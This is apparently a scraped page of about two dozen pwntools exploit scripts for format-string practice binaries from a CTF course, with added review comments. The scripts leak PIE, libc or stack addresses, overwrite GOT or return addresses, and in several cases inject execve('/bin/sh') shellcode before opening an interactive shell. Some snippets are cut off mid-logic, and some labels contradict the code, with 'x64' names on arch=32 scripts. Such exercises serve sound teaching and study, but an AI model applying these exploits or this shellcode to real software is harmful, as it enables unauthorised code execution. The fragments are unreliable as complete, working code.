示例#1
0
import sf
import sys
import signal

# Exploit script for the local "chall-test_FmtString-13-x86" practice binary.
# NOTE(review): `process` and `gdb` are pwntools names (`from pwn import *`)
# and are not imported in this snippet; `sys` and `signal` are imported above
# but never used here.
target = process("./chall-test_FmtString-13-x86")
# Attach gdb and run `verify_exploit` as gdb commands (presumably a
# harness-defined gdb command; not shown here).
gdb.attach(target, execute="verify_exploit")

# NOTE(review): constructed but never used — the final input is built from a
# second BufferOverflow instance further down.
bof_payload = sf.BufferOverflow(arch=32)

# The binary prints a hex address after this prompt; read and parse it.
# NOTE(review): str delimiter — pwntools accepts it but warns on Python 3;
# the bytes literal form is the clean one.
target.recvuntil("Tell me I was never good enough: ")
leak = int(target.recvline().strip(b"\n"), 16)
# 108 is an unnamed magic offset from the leaked value; it equals the
# `start=108` / `add_bytes(108, ...)` below, so presumably the same buffer
# distance — give it a name so the three uses cannot drift apart.
ret_address = leak + (108)
# Build the format-string write with the project `sf` helper. The keyword
# arguments' semantics (offset, printed_bytes, alignment_bytes, *_base) are
# defined by sf and not visible here; confirm against sf before changing them.
# Both bases are ret_address, so value and address are relative to it.
fs = sf.WriteFmtStr(arch=32,
                    value=-0x46,
                    address=0x0,
                    offset=0x4,
                    printed_bytes=0x0,
                    alignment_bytes=0x0,
                    value_base=ret_address,
                    address_base=ret_address)

# Final input: the generated format string plus an opaque byte blob (appears
# to be machine code; not decoded or verified here). `add_bytes(n, data)`:
# n is presumably a buffer offset — sf semantics, not visible here.
payload = sf.BufferOverflow(arch=32, start=108)
payload.add_bytes(108, fs.generate_fmt_str())
payload.add_bytes(
    70,
    b"\x83\xec\x7f\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\x04\x05\x04\x06\xcd\x80\xb0\x01\x31\xdb\xcd\x80"
)
target.sendline(payload.generate_payload())

# Exploit Verification starts here 15935728

示例#2
0
from pwn import *

import os
import sf
import sys
import signal

# Exploit script for the local "chall-test_FmtString-01-x64" practice binary:
# a single format-string write built by the project `sf` helper.
# NOTE(review): `os` and `sys` are imported above but never used here.
target = process("./chall-test_FmtString-01-x64")
# Attach gdb and run `verify_exploit` as gdb commands (presumably a
# harness-defined gdb command; not shown here).
gdb.attach(target, execute="verify_exploit")

# NOTE(review): constructed but never used in this script.
bof_payload = sf.BufferOverflow(arch=64)

# Keyword semantics (offset, printed_bytes, alignment_bytes, *_base) are
# defined by sf and not visible here. Both bases are 0, so value and address
# are used as given (no relocation added).
fs = sf.WriteFmtStr(arch=64,
                    value=0x401196,
                    address=0x403398,
                    offset=0x6,
                    printed_bytes=0x0,
                    alignment_bytes=0x0,
                    value_base=0,
                    address_base=0)
payload = fs.generate_fmt_str()
target.sendline(payload)

# Exploit Verification starts here 15935728


def handler(signum, frame):
    """SIGALRM handler: abort the run by raising instead of hanging.

    Registered with ``signal.signal(signal.SIGALRM, handler)`` below.

    Args:
        signum: delivered signal number (ignored).
        frame: interrupted stack frame (ignored).

    Raises:
        Exception: always, with the message "Timed out".
    """
    del signum, frame  # unused; the handler's only job is to raise
    raise Exception("Timed out")


# Arm a 2-second watchdog: SIGALRM runs handler(), which raises "Timed out".
# NOTE(review): armed only after the payload was already sent above, so it
# bounds whatever follows (presumably the gdb verification), not the send.
signal.signal(signal.SIGALRM, handler)
signal.alarm(2)
示例#3
0
import signal

# Exploit script for "chall-test_FmtString-17-x86": a PIE leak followed by
# format-string writes built with the project `sf` helper.
# NOTE(review): `process`, `gdb` and `sf` are not imported in this snippet.
target = process("./chall-test_FmtString-17-x86")
gdb.attach(target, execute="verify_exploit")

bof_payload = sf.BufferOverflow(arch=32)

# The binary prints a hex address after this prompt; parse it and derive the
# PIE base with an unnamed magic offset (4684), then register it with sf.
# NOTE(review): str delimiter — pwntools accepts it but warns on Python 3.
target.recvuntil("Cancelled out and rendered obsolute: ")
leak = int(target.recvline().strip(b"\n"), 16)
pie_base = leak - (4684)
bof_payload.add_base("pie", pie_base)
# First write: both bases are pie_base, so value and address are PIE-relative.
# Keyword semantics are defined by sf and not visible here.
fs = sf.WriteFmtStr(
		arch = 32,
		value = 0x124c,
		address = 0x3324,
		offset = 0x7,
		printed_bytes = 0x0,
		alignment_bytes = 0x1,
		value_base = pie_base,
		address_base = pie_base)
payload = fs.generate_fmt_str()
target.sendline(payload)
# NOTE(review): this second write is assigned but never generated or sent
# within the visible lines — the snippet appears truncated here.
fs = sf.WriteFmtStr(
		arch = 32,
		value = 0x10b0,
		address = 0x3330,
		offset = 0x7,
		printed_bytes = 0x0,
		alignment_bytes = 0x1,
		value_base = pie_base,
		address_base = pie_base)
示例#4
0
import signal

# Exploit script for "chall-test_FmtString-11-x64", run against a bundled
# libc via LD_PRELOAD; the libc offset below presumably belongs to that file.
# NOTE(review): `process`, `gdb` and `sf` are not imported in this snippet.
target = process("./chall-test_FmtString-11-x64",
                 env={"LD_PRELOAD": "./libc-2.30.so"})
# No `execute=` script here, unlike the verify_exploit runs elsewhere on this page.
gdb.attach(target)
bof_payload = sf.BufferOverflow(arch=64)

# The binary prints a hex address after this prompt; 413040 is an unnamed
# magic offset from it to the libc base — name it next to the libc it belongs to.
# NOTE(review): str delimiter — pwntools accepts it but warns on Python 3.
target.recvuntil("It seems I've been buried alive: ")
leak = int(target.recvuntil(b"\n").strip(b"\n"), 16)
libc_base = leak - (413040)
bof_payload.add_base("libc", libc_base)
print("libcBase is: %s" % hex(libc_base))
# value is libc-relative (value_base=libc_base); address is used as given
# (address_base=0). Keyword semantics are defined by sf, not visible here.
fs = sf.WriteFmtStr(arch=64,
                    value=0xe6b93,
                    address=0x4033b8,
                    offset=0x6,
                    printed_bytes=0x0,
                    alignment_bytes=0x0,
                    value_base=libc_base,
                    address_base=0)
payload = fs.generate_fmt_str()
target.sendline(payload)

# Exploit Verification starts here 15935728


def handler(signum, frame):
    """SIGALRM handler: abort the run by raising instead of hanging.

    Registered with ``signal.signal(signal.SIGALRM, handler)`` below.

    Args:
        signum: delivered signal number (ignored).
        frame: interrupted stack frame (ignored).

    Raises:
        Exception: always, with the message "Timed out".
    """
    del signum, frame  # unused; the handler's only job is to raise
    raise Exception("Timed out")


# Arm a 2-second watchdog: SIGALRM runs handler(), which raises "Timed out".
# NOTE(review): armed after the payload was already sent above, so it only
# bounds whatever follows in the harness.
signal.signal(signal.SIGALRM, handler)
signal.alarm(2)
示例#5
0
# For more info checkout: https://github.com/guyinatuxedo/nightmare/tree/master/modules/10-fmt_strings

from pwn import *

import sf

# Exploit script for "chall-test_FmtString-14-x86": format-string writes with
# absolute value/address (both bases 0), built by the project `sf` helper.
target = process("./chall-test_FmtString-14-x86")
gdb.attach(target)

# NOTE(review): constructed but never used in this script.
bof_payload = sf.BufferOverflow(arch=32)

# Keyword semantics (offset, printed_bytes, alignment_bytes, *_base) are
# defined by sf and not visible here; confirm before changing them.
fs = sf.WriteFmtStr(
		arch = 32,
		value = 0x80492a3,
		address = 0x804c010,
		offset = 0x6,
		printed_bytes = 0x0,
		alignment_bytes = 0x1,
		value_base = 0,
		address_base = 0)
payload = fs.generate_fmt_str()
target.sendline(payload)
# NOTE(review): this second write is assigned but never generated or sent
# within the visible lines — the snippet appears truncated here.
fs = sf.WriteFmtStr(
		arch = 32,
		value = 0x80490e0,
		address = 0x804c00c,
		offset = 0x6,
		printed_bytes = 0x0,
		alignment_bytes = 0x1,
		value_base = 0,
		address_base = 0)
示例#6
0
# Fragment of a larger script: `target` and `sf` are defined earlier (not shown).
# Leak step: send a positional `%x` directive bracketed by two markers, then cut
# the hex text the program echoes out from between the markers.
leakPayload = b""
leakPayload += b"xxxxxxx"
leakPayload += b"%3$x"
leakPayload += b"yyyyyyy"
target.sendline(leakPayload)
leak = target.recvuntil(b"yyyyyyy")
# NOTE(review): bytes.strip() removes a character *set* from both ends, not the
# literal suffix; it works here only because hex digits never contain 'y'.
# `removesuffix(b"yyyyyyy")` (3.9+) states the intent exactly.
leak = leak.strip(b"yyyyyyy")
# Keep what follows the first marker — assumes the marker occurs once in the echo.
leak = leak.split(b"xxxxxxx")[1]
leak = int(leak, 0x10)

# 0x128f is an unnamed magic offset from the leaked value to the PIE base.
pie_base = leak - 0x128f
print("PieBase is: %s" % hex(pie_base))
# Both bases are pie_base, so value and address are PIE-relative. Keyword
# semantics are defined by sf and not visible here.
fs = sf.WriteFmtStr(arch=32,
                    value=0x124d,
                    address=0x3314,
                    offset=0x6,
                    printed_bytes=0x0,
                    alignment_bytes=0x0,
                    value_base=pie_base,
                    address_base=pie_base)
payload = fs.generate_fmt_str()
target.sendline(payload)

# Hand the connection to the user.
target.interactive()

# +------------------------------------------------+
# | Artist: Slipknot                               |
# +------------------------------------------------+
# | Song: (515)                                    |
# +------------------------------------------------+
# | *sid screaming                                 |
# +------------------------------------------------+
示例#7
0
# Fragment of a larger script: `target` and `sf` are defined earlier (not shown).
# Leak step: send a positional `%lx` directive bracketed by two markers, then
# cut the hex text the program echoes out from between the markers.
leakPayload = b""
leakPayload += b"xxxxxxx"
leakPayload += b"%13$lx"
leakPayload += b"yyyyyyy"
target.sendline(leakPayload)
leak = target.recvuntil(b"yyyyyyy")
# NOTE(review): bytes.strip() removes a character *set*, not the literal suffix;
# safe only because hex digits never contain 'y'. `removesuffix` (3.9+) is exact.
leak = leak.strip(b"yyyyyyy")
# Keep what follows the first marker — assumes the marker occurs once in the echo.
leak = leak.split(b"xxxxxxx")[1]
leak = int(leak, 0x10)

# 0xbf7e5 is an unnamed magic offset from the leaked value to the libc base;
# it is only valid for one specific libc build — record which one.
libc_base = leak - 0xbf7e5
print("libcBase is: %s" % hex(libc_base))
# value is libc-relative (value_base=libc_base); address is used as given.
# Keyword semantics are defined by sf and not visible here.
fs = sf.WriteFmtStr(arch=64,
                    value=0x554e0,
                    address=0x403358,
                    offset=0x8,
                    printed_bytes=0x0,
                    alignment_bytes=0x0,
                    value_base=libc_base,
                    address_base=0)
payload = fs.generate_fmt_str()
target.sendline(payload)

# NOTE(review): str argument — pwntools accepts it but warns on Python 3; the
# "\x00" encodes to a single NUL byte, so b"/bin/sh\x00" is the exact equivalent.
target.sendline("/bin/sh\x00")

# Exploit Verification starts here 15935728


def handler(signum, frame):
    """Intended SIGALRM handler: abort the run by raising instead of hanging.

    The ``signal.signal`` registration is not part of this snippet.

    Args:
        signum: delivered signal number (ignored).
        frame: interrupted stack frame (ignored).

    Raises:
        Exception: always, with the message "Timed out".
    """
    del signum, frame  # unused; the handler's only job is to raise
    raise Exception("Timed out")

示例#8
0
import os
import sf
import sys
import signal

# Exploit script for "chall-test_angstrum16-format1": one format-string write
# with absolute value/address (both bases 0), built by the project `sf` helper.
# NOTE(review): `process` and `gdb` are not imported in this snippet; `os` and
# `sys` are imported above but never used.
target = process("./chall-test_angstrum16-format1")
gdb.attach(target, execute="verify_exploit")

# NOTE(review): constructed but never used in this script.
bof_payload = sf.BufferOverflow(arch=64)

# Keyword semantics (offset, printed_bytes, alignment_bytes, *_base) are
# defined by sf and not visible here; confirm before changing them.
fs = sf.WriteFmtStr(
		arch = 64,
		value = 0x40074d,
		address = 0x601030,
		offset = 0x8,
		printed_bytes = 0x0,
		alignment_bytes = 0x0,
		value_base = 0,
		address_base = 0)
payload = fs.generate_fmt_str()
target.sendline(payload)

# Exploit Verification starts here 15935728

def handler(signum, frame):
	"""SIGALRM handler: abort the run by raising instead of hanging.

	Registered with ``signal.signal(signal.SIGALRM, handler)`` below.

	Args:
		signum: delivered signal number (ignored).
		frame: interrupted stack frame (ignored).

	Raises:
		Exception: always, with the message "Timed out".
	"""
	del signum, frame  # unused; the handler's only job is to raise
	raise Exception("Timed out")

# Arm a 2-second watchdog: SIGALRM runs handler(), which raises "Timed out".
# NOTE(review): armed after the payload was already sent above.
signal.signal(signal.SIGALRM, handler)
signal.alarm(2)
示例#9
0
from pwn import *

import sf

# Exploit script for "chall-test_FmtString-13-x64": a stack-address leak, then
# a format-string write and a raw byte blob packed into one input via `sf`.
target = process("./chall-test_FmtString-13-x64")
gdb.attach(target)

# NOTE(review): constructed but never used — the final input is built from a
# second BufferOverflow instance further down.
bof_payload = sf.BufferOverflow(arch=64)

# The binary prints a hex address after this prompt; read and parse it.
# NOTE(review): str delimiter — pwntools accepts it but warns on Python 3.
target.recvuntil("Tell me I was never good enough: ")
leak = int(target.recvuntil(b"\n").strip(b"\n"), 16)
# 152 is an unnamed magic offset; it equals the `start=152` / `add_bytes(152, ...)`
# below, so presumably the same buffer distance — name it once.
ret_address = leak + (152)
# value is relative to ret_address; address is used as given (address_base=0).
# Keyword semantics are defined by sf and not visible here.
fs = sf.WriteFmtStr(arch=64,
                    value=-0x40,
                    address=0x403390,
                    offset=0x6,
                    printed_bytes=0x0,
                    alignment_bytes=0x0,
                    value_base=ret_address,
                    address_base=0)

# Final input: the generated format string plus an opaque byte blob (appears
# to be machine code; not decoded or verified here). `add_bytes(n, data)`:
# n is presumably a buffer offset — sf semantics, not visible here.
payload = sf.BufferOverflow(arch=64, start=152)
payload.add_bytes(152, fs.generate_fmt_str())
payload.add_bytes(
    64,
    b"\x31\xf6\x48\xbf\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdf\xf7\xe6\x04\x3b\x57\x54\x5f\x0f\x05"
)
target.sendline(payload.generate_payload())

# Hand the connection to the user.
target.interactive()

# +------------------------------------------------+
示例#10
0
# For more info checkout: https://github.com/guyinatuxedo/nightmare/tree/master/modules/10-fmt_strings

from pwn import *

import sf

# Exploit script for "chall-test_ractf-nra": one format-string write with
# absolute value/address (both bases 0), built by the project `sf` helper.
target = process("./chall-test_ractf-nra")
gdb.attach(target)

# NOTE(review): constructed but never used in this script.
bof_payload = sf.BufferOverflow(arch=32)

# Keyword semantics (offset, printed_bytes, alignment_bytes, *_base) are
# defined by sf and not visible here; confirm before changing them.
fs = sf.WriteFmtStr(
		arch = 32,
		value = 0x8049245,
		address = 0x804c018,
		offset = 0x4,
		printed_bytes = 0x0,
		alignment_bytes = 0x0,
		value_base = 0,
		address_base = 0)
payload = fs.generate_fmt_str()
target.sendline(payload)


# Hand the connection to the user.
target.interactive()

# +------------------------------------------------+
# | Artist: Slipknot                               |
# +------------------------------------------------+
# | Song: Spit it Out                              |
# +------------------------------------------------+
示例#11
0
#
# For more info checkout: https://github.com/guyinatuxedo/nightmare/tree/master/modules/10-fmt_strings

from pwn import *

import sf

# Exploit script for the binary named "chall-test_FmtString-03-x64".
# NOTE(review): the file name says x64 but everything below is 32-bit
# (arch=32, 0x804xxxx-style addresses); one of the two is mislabelled — confirm
# which binary this script really targets.
target = process("./chall-test_FmtString-03-x64")
gdb.attach(target)

# NOTE(review): constructed but never used in this script.
bof_payload = sf.BufferOverflow(arch=32)

# One format-string write with absolute value/address (both bases 0). Unlike
# most scripts on this page, printed_bytes and alignment_bytes are non-zero;
# their semantics are defined by sf and not visible here.
fs = sf.WriteFmtStr(arch=32,
                    value=0x8049236,
                    address=0x804b2f4,
                    offset=0x8,
                    printed_bytes=0x5,
                    alignment_bytes=0x2,
                    value_base=0,
                    address_base=0)
payload = fs.generate_fmt_str()
target.sendline(payload)

# Hand the connection to the user.
target.interactive()

# +------------------------------------------------+
# | Artist: Distrubed                              |
# +------------------------------------------------+
# | Song: The Light                                |
# +------------------------------------------------+
# | Sometimes darkness,                            |
# | can show you,                                  |
示例#12
0
#
# For more info checkout: https://github.com/guyinatuxedo/nightmare/tree/master/modules/10-fmt_strings

from pwn import *

import sf

# Exploit script for the binary named "chall-test_FmtString-02-x64".
# NOTE(review): the file name says x64 but everything below is 32-bit
# (arch=32, 0x804xxxx-style addresses); one of the two is mislabelled — confirm
# which binary this script really targets.
target = process("./chall-test_FmtString-02-x64")
gdb.attach(target)

# NOTE(review): constructed but never used in this script.
bof_payload = sf.BufferOverflow(arch=32)

# One format-string write with absolute value/address (both bases 0).
# printed_bytes=0x10 is non-zero here; its meaning is defined by sf, not
# visible in this file.
fs = sf.WriteFmtStr(arch=32,
                    value=0x8049216,
                    address=0x804b2e4,
                    offset=0xa,
                    printed_bytes=0x10,
                    alignment_bytes=0x0,
                    value_base=0,
                    address_base=0)
payload = fs.generate_fmt_str()
target.sendline(payload)

# Hand the connection to the user.
target.interactive()

# +------------------------------------------------+
# | Artist: Five Finger Death Punch                |
# +------------------------------------------------+
# | Song: Coming Down                              |
# +------------------------------------------------+
# | I'm                                            |
# | Coming Down                                    |
示例#13
0
from pwn import *

import os
import sf
import sys
import signal

# Exploit script for "chall-test_tamu17-pwn3": one format-string write with
# absolute value/address (both bases 0), built by the project `sf` helper.
# NOTE(review): `os` and `sys` are imported above but never used here.
target = process("./chall-test_tamu17-pwn3")
gdb.attach(target, execute="verify_exploit")

# NOTE(review): constructed but never used in this script.
bof_payload = sf.BufferOverflow(arch=32)

# Keyword semantics (offset, printed_bytes, alignment_bytes, *_base) are
# defined by sf and not visible here; confirm before changing them.
fs = sf.WriteFmtStr(arch=32,
                    value=0x80485ab,
                    address=0x804a01c,
                    offset=0x4,
                    printed_bytes=0x0,
                    alignment_bytes=0x0,
                    value_base=0,
                    address_base=0)
payload = fs.generate_fmt_str()
target.sendline(payload)

# Exploit Verification starts here 15935728


def handler(signum, frame):
    """SIGALRM handler: abort the run by raising instead of hanging.

    Registered with ``signal.signal(signal.SIGALRM, handler)`` below.

    Args:
        signum: delivered signal number (ignored).
        frame: interrupted stack frame (ignored).

    Raises:
        Exception: always, with the message "Timed out".
    """
    del signum, frame  # unused; the handler's only job is to raise
    raise Exception("Timed out")


# Arm a 2-second watchdog: SIGALRM runs handler(), which raises "Timed out".
# NOTE(review): armed after the payload was already sent above.
signal.signal(signal.SIGALRM, handler)
signal.alarm(2)
示例#14
0
import sf

# Exploit script for "chall-test_FmtString-15-x86": a PIE leak followed by two
# format-string writes built with the project `sf` helper.
# NOTE(review): `process` and `gdb` are not imported in this snippet.
target = process("./chall-test_FmtString-15-x86")
gdb.attach(target)

bof_payload = sf.BufferOverflow(arch=32)

# The binary prints a hex address after this prompt; parse it and derive the
# PIE base with an unnamed magic offset (4826), then register it with sf.
# NOTE(review): str delimiter — pwntools accepts it but warns on Python 3.
target.recvuntil("Total Nightmare: ")
leak = int(target.recvline().strip(b"\n"), 16)
pie_base = leak - (4826)
bof_payload.add_base("pie", pie_base)
# First write: both bases are pie_base, so value and address are PIE-relative.
# Keyword semantics are defined by sf and not visible here.
fs = sf.WriteFmtStr(arch=32,
                    value=0x12da,
                    address=0x33a4,
                    offset=0x6,
                    printed_bytes=0x0,
                    alignment_bytes=0x1,
                    value_base=pie_base,
                    address_base=pie_base)
payload = fs.generate_fmt_str()
target.sendline(payload)
# Second write, same shape; `fs`/`payload` are reused rather than renamed.
fs = sf.WriteFmtStr(arch=32,
                    value=0x10f0,
                    address=0x33a0,
                    offset=0x6,
                    printed_bytes=0x0,
                    alignment_bytes=0x1,
                    value_base=pie_base,
                    address_base=pie_base)
payload = fs.generate_fmt_str()
target.sendline(payload)
示例#15
0
from pwn import *

import sf

# Exploit script for "chall-test_FmtString-11-x86": a stack-address leak, then
# one format-string write built with the project `sf` helper.
target = process("./chall-test_FmtString-11-x86")
gdb.attach(target)

# NOTE(review): constructed but never used in this script.
bof_payload = sf.BufferOverflow(arch=32)

# The binary prints a hex address after this prompt; read and parse it.
# NOTE(review): str delimiter — pwntools accepts it but warns on Python 3.
target.recvuntil("Tell me I was never good enough: ")
leak = int(target.recvline().strip(b"\n"), 16)
# 532 is an unnamed magic offset from the leaked value — name it.
ret_address = leak + (532)
# address is relative to ret_address (address_base); value is absolute.
# NOTE(review): value_base=None — every other script on this page passes 0 for
# "no base"; whether sf treats None the same way is not visible here. Confirm,
# or use 0 for consistency.
fs = sf.WriteFmtStr(arch=32,
                    value=0x80491f6,
                    address=0x0,
                    offset=0x6,
                    printed_bytes=0x0,
                    alignment_bytes=0x0,
                    value_base=None,
                    address_base=ret_address)
payload = fs.generate_fmt_str()
target.sendline(payload)

# Hand the connection to the user.
target.interactive()

# +------------------------------------------------+
# | Artist: Distrubed                              |
# +------------------------------------------------+
# | Song: The Sound of Silence                     |
# +------------------------------------------------+
# | Hello Darkness,                                |
# | my old friend                                  |
示例#16
0
from pwn import *

import sf

# Exploit script for "chall-test_FmtString-20-x86": a stack-address leak, then
# a format-string write and a raw byte blob packed into one input via `sf`.
target = process("./chall-test_FmtString-20-x86")
gdb.attach(target)

# NOTE(review): constructed but never used — the final input is built from a
# second BufferOverflow instance further down.
bof_payload = sf.BufferOverflow(arch=32)

# The binary prints a hex address after this prompt; read and parse it.
# NOTE(review): str delimiter — pwntools accepts it but warns on Python 3.
target.recvuntil("Tell me I was never good enough: ")
leak = int(target.recvline().strip(b"\n"), 16)
# 87 is an unnamed magic offset; it equals the `start=87` / `add_bytes(87, ...)`
# below, so presumably the same buffer distance — name it once.
ret_address = leak + (87)
# value is relative to ret_address; address is used as given (address_base=0).
# Keyword semantics (including alignment_bytes=0x3) are defined by sf.
fs = sf.WriteFmtStr(arch=32,
                    value=-0x31,
                    address=0x804b2d8,
                    offset=0x6,
                    printed_bytes=0x0,
                    alignment_bytes=0x3,
                    value_base=ret_address,
                    address_base=0)

# Final input: the generated format string plus an opaque byte blob (appears
# to be machine code; not decoded or verified here). `add_bytes(n, data)`:
# n is presumably a buffer offset — sf semantics, not visible here.
payload = sf.BufferOverflow(arch=32, start=87)
payload.add_bytes(87, fs.generate_fmt_str())
payload.add_bytes(
    49,
    b"\x83\xec\x7f\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\x04\x05\x04\x06\xcd\x80\xb0\x01\x31\xdb\xcd\x80"
)
target.sendline(payload.generate_payload())

# Hand the connection to the user.
target.interactive()

# +------------------------------------------------+
示例#17
0
import os
import sf
import sys
import signal

# Exploit script for "chall-test_redpwn19-rot26": one format-string write with
# absolute value/address (both bases 0), built by the project `sf` helper.
# NOTE(review): `process` and `gdb` are not imported in this snippet; `os` and
# `sys` are imported above but never used.
target = process("./chall-test_redpwn19-rot26")
gdb.attach(target, execute="verify_exploit")

# NOTE(review): constructed but never used in this script.
bof_payload = sf.BufferOverflow(arch=32)

# Keyword semantics (offset, printed_bytes, alignment_bytes, *_base) are
# defined by sf and not visible here; confirm before changing them.
fs = sf.WriteFmtStr(
		arch = 32,
		value = 0x8048737,
		address = 0x804a020,
		offset = 0x7,
		printed_bytes = 0x0,
		alignment_bytes = 0x0,
		value_base = 0,
		address_base = 0)
payload = fs.generate_fmt_str()
target.sendline(payload)

# Exploit Verification starts here 15935728

def handler(signum, frame):
	"""SIGALRM handler: abort the run by raising instead of hanging.

	Registered with ``signal.signal(signal.SIGALRM, handler)`` below.

	Args:
		signum: delivered signal number (ignored).
		frame: interrupted stack frame (ignored).

	Raises:
		Exception: always, with the message "Timed out".
	"""
	del signum, frame  # unused; the handler's only job is to raise
	raise Exception("Timed out")

# Arm a 2-second watchdog: SIGALRM runs handler(), which raises "Timed out".
# NOTE(review): armed after the payload was already sent above.
signal.signal(signal.SIGALRM, handler)
signal.alarm(2)
示例#18
0
# For more info checkout: https://github.com/guyinatuxedo/nightmare/tree/master/modules/10-fmt_strings

from pwn import *
import time
import sf

# Exploit script for "Correction-FsGotShellcodeFsleak-x86": one format-string
# write, then a second input that combines a raw byte blob with a marker-
# bracketed leak directive.
# NOTE(review): `time` is imported above but never used here.
target = process("./Correction-FsGotShellcodeFsleak-x86")
gdb.attach(target)

# NOTE(review): constructed but never used in this script.
bof_payload = sf.BufferOverflow(arch=32)

# Absolute value/address (both bases 0). Keyword semantics are defined by sf
# and not visible here.
fs = sf.WriteFmtStr(
		arch = 32,
		value = 0x804922b,
		address = 0x804b2b0,
		offset = 0x7,
		printed_bytes = 0x0,
		alignment_bytes = 0x0,
		value_base = 0,
		address_base = 0)
payload = fs.generate_fmt_str()
target.sendline(payload)
# Second input: an opaque byte blob (appears to be machine code; not decoded or
# verified here) followed by a positional `%x` directive between two markers.
leakPayload = b""
leakPayload += b"\x83\xec\x7f\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\x04\x05\x04\x06\xcd\x80\xb0\x01\x31\xdb\xcd\x80"
leakPayload += b"xxxxxxx"
leakPayload += b"%134$x"
leakPayload += b"yyyyyyy"
target.sendline(leakPayload)
leak = target.recvuntil(b"yyyyyyy")
# NOTE(review): bytes.strip() removes a character *set*, not the literal suffix;
# safe only because hex digits never contain 'y'. `removesuffix` (3.9+) is exact.
leak = leak.strip(b"yyyyyyy")
# Keep what follows the first marker. NOTE(review): `leak` is never parsed or
# used within the visible lines — the snippet appears truncated here.
leak = leak.split(b"xxxxxxx")[1]
示例#19
0
from pwn import *

import os
import sf
import sys
import signal

# Exploit script for "chall-test_FmtString-16-x86": one format-string write with
# absolute value/address (both bases 0), built by the project `sf` helper.
# NOTE(review): `os` and `sys` are imported above but never used here.
target = process("./chall-test_FmtString-16-x86")
gdb.attach(target, execute="verify_exploit")

# NOTE(review): constructed but never used in this script.
bof_payload = sf.BufferOverflow(arch=32)

# Keyword semantics (offset, printed_bytes, alignment_bytes, *_base) are
# defined by sf and not visible here; confirm before changing them.
fs = sf.WriteFmtStr(arch=32,
                    value=0x80491e6,
                    address=0x804b310,
                    offset=0x7,
                    printed_bytes=0x0,
                    alignment_bytes=0x3,
                    value_base=0,
                    address_base=0)
payload = fs.generate_fmt_str()
target.sendline(payload)

# Exploit Verification starts here 15935728


def handler(signum, frame):
    """SIGALRM handler: abort the run by raising instead of hanging.

    Registered with ``signal.signal(signal.SIGALRM, handler)`` below.

    Args:
        signum: delivered signal number (ignored).
        frame: interrupted stack frame (ignored).

    Raises:
        Exception: always, with the message "Timed out".
    """
    del signum, frame  # unused; the handler's only job is to raise
    raise Exception("Timed out")


# Arm a 2-second watchdog: SIGALRM runs handler(), which raises "Timed out".
# NOTE(review): armed after the payload was already sent above.
signal.signal(signal.SIGALRM, handler)
signal.alarm(2)
import sf
from pwn import *

# Exploit script against a service on localhost:30011 (a local process with
# gdb attached is the commented-out alternative). One format-string write with
# absolute value/address (both bases 0), built by the project `sf` helper.
target = remote("localhost", 30011)
# target = process("./chall_11")
# gdb.attach(target)


# First input the service expects before the format string (meaning not
# visible here); then consume one line of its reply.
target.sendline(b"00")

target.recvline()



# Keyword semantics (offset, printed_bytes, alignment_bytes, *_base) are
# defined by sf and not visible here; confirm before changing them.
fs = sf.WriteFmtStr(
		arch = 32,
		value = 0x80484e6,
		address = 0x8049918,
		offset = 0x6,
		printed_bytes = 0x0,
		alignment_bytes = 0x0,
		value_base = 0x0,
		address_base = 0x0)

payload = fs.generate_fmt_str()
target.sendline(payload)

# NOTE(review): the same payload is sent a second time. If the service reads
# the format string only once, this line is leftover input that the interactive
# session below will deliver to whatever reads next; if it is intentional
# (e.g. the service prompts twice), say so in a comment.
target.sendline(payload)

# Hand the connection to the user.
target.interactive()
示例#21
0
import sf

# Exploit script for "chall-test_FmtString-04-x64": a PIE leak followed by one
# format-string write built with the project `sf` helper.
# NOTE(review): `process` and `gdb` are not imported in this snippet.
target = process("./chall-test_FmtString-04-x64")
gdb.attach(target)

bof_payload = sf.BufferOverflow(arch=64)

# The binary prints a hex address after this prompt; parse it and derive the
# PIE base with an unnamed magic offset (4576), then register it with sf.
# NOTE(review): str delimiter — pwntools accepts it but warns on Python 3.
target.recvuntil("We're dreaming: ")
leak = int(target.recvuntil(b"\n").strip(b"\n"), 16)
pie_base = leak - (4576)
bof_payload.add_base("pie", pie_base)
# Both bases are pie_base, so value and address are PIE-relative. Keyword
# semantics are defined by sf and not visible here.
fs = sf.WriteFmtStr(arch=64,
                    value=0x11c9,
                    address=0x33d0,
                    offset=0x6,
                    printed_bytes=0x0,
                    alignment_bytes=0x0,
                    value_base=pie_base,
                    address_base=pie_base)
payload = fs.generate_fmt_str()
target.sendline(payload)

# Hand the connection to the user.
target.interactive()

# +------------------------------------------------+
# | Artist: Green Day                              |
# +------------------------------------------------+
# | Song: Holiday                                  |
# +------------------------------------------------+
# | Hear the sound of the                          |
# | falling rain                                   |
示例#22
0
#
# For more info checkout: https://github.com/guyinatuxedo/nightmare/tree/master/modules/10-fmt_strings

from pwn import *
import time
import sf

# Exploit script for "Correction-FsGotShellcodeFsleak-x64": one format-string
# write, then a second input that combines a marker-bracketed leak directive
# with a raw byte blob.
# NOTE(review): `time` is imported above but never used here.
target = process("./Correction-FsGotShellcodeFsleak-x64")
gdb.attach(target)

# NOTE(review): constructed but never used in this script.
bof_payload = sf.BufferOverflow(arch=64)

# Absolute value/address (both bases 0). Keyword semantics are defined by sf
# and not visible here.
fs = sf.WriteFmtStr(arch=64,
                    value=0x4011be,
                    address=0x403388,
                    offset=0x6,
                    printed_bytes=0x0,
                    alignment_bytes=0x0,
                    value_base=0,
                    address_base=0)
payload = fs.generate_fmt_str()
target.sendline(payload)
# Second input: a positional `%lx` directive between two markers, followed by
# an opaque byte blob (appears to be machine code; not decoded or verified here).
leakPayload = b""
leakPayload += b"xxxxxxx"
leakPayload += b"%70$lx"
leakPayload += b"yyyyyyy"
leakPayload += b"\x31\xf6\x48\xbf\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdf\xf7\xe6\x04\x3b\x57\x54\x5f\x0f\x05"
target.sendline(leakPayload)
leak = target.recvuntil(b"yyyyyyy")
# NOTE(review): bytes.strip() removes a character *set*, not the literal suffix;
# safe only because hex digits never contain 'y'. `removesuffix` (3.9+) is exact.
leak = leak.strip(b"yyyyyyy")
# Keep what follows the first marker — assumes the marker occurs once in the echo.
